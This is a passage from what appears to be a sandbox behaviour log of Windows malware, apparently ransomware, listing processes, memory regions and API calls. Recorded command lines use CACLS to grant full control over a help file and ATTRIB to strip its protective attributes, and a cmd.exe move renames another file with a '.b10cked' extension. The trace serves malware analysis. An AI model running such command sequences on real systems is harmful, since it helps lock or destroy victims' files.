returned 0x1b5 [0197.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.236] exit (_Code=0) Process: id = "456" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166a0" os_pid = "0x458" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "455" os_parent_pid = "0xbc0" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29034 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29035 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29036 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29037 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29038 start_va = 0xf80000 end_va = 0xf88fff entry_point = 0xf80000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 29039 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29040 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29041 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29042 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 29043 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29044 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29045 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29046 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29047 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 29048 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 29049 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29050 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 29051 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29052 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 29053 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29054 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 29055 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 651 os_tid = 0xc10 Thread: id = 652 os_tid = 0xc50 Process: id = "457" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xc58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "455" os_parent_pid = "0xbc0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29059 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29060 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29061 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29062 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29063 start_va = 0xa10000 end_va = 0xa16fff entry_point = 0xa10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 29064 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29065 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29066 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29067 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29068 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29069 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29070 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29071 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29072 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 29073 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 29074 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 29075 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29076 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 29077 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29078 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29079 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 29080 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29081 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29082 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29083 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 29084 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29085 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29086 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29087 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29088 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 653 os_tid = 0x678 Process: id = "458" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29111 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29112 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29113 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29114 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29115 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29116 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29117 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29118 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29119 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29120 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29169 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29170 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29171 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29172 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 29173 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 29174 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29175 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29176 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29177 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29179 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29181 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29182 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29183 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 29184 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29185 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29186 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29187 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29188 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29189 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29190 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29191 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29192 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29194 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 656 os_tid = 0xa24 [0197.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd2c | out: lpSystemTimeAsFileTime=0x1efd2c*(dwLowDateTime=0xaa898180, dwHighDateTime=0x1d440a9)) [0197.492] GetCurrentProcessId () returned 0xb8c [0197.492] GetCurrentThreadId () returned 0xa24 [0197.492] GetTickCount () returned 0x37edf [0197.492] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd24 | out: lpPerformanceCount=0x1efd24*=25428124270) returned 1 [0197.493] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0197.493] __set_app_type (_Type=0x1) [0197.493] __p__fmode () returned 0x76b331f4 [0197.493] __p__commode () returned 0x76b331fc [0197.493] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.493] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.493] GetCurrentThreadId () returned 0xa24 [0197.493] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa24) returned 0x38 [0197.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.494] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efcbc | out: phkResult=0x1efcbc*=0x0) returned 0x2 [0197.494] VirtualQuery (in: lpAddress=0x1efcf3, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] GetConsoleOutputCP () returned 0x1b5 [0197.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.494] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.494] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.495] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.495] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.495] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.495] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.495] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.496] GetEnvironmentStringsW () returned 0x380180* [0197.496] FreeEnvironmentStringsW (penv=0x380180) returned 1 [0197.496] GetEnvironmentStringsW () returned 0x380180* [0197.496] FreeEnvironmentStringsW (penv=0x380180) returned 1 [0197.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec2c | out: phkResult=0x1eec2c*=0x40) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0xa8, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x0, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegCloseKey (hKey=0x40) returned 0x0 [0197.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec2c | out: phkResult=0x1eec2c*=0x40) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x0, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegCloseKey (hKey=0x40) returned 0x0 [0197.497] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639f [0197.497] srand (_Seed=0x5b88639f) [0197.497] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" [0197.497] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" [0197.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" 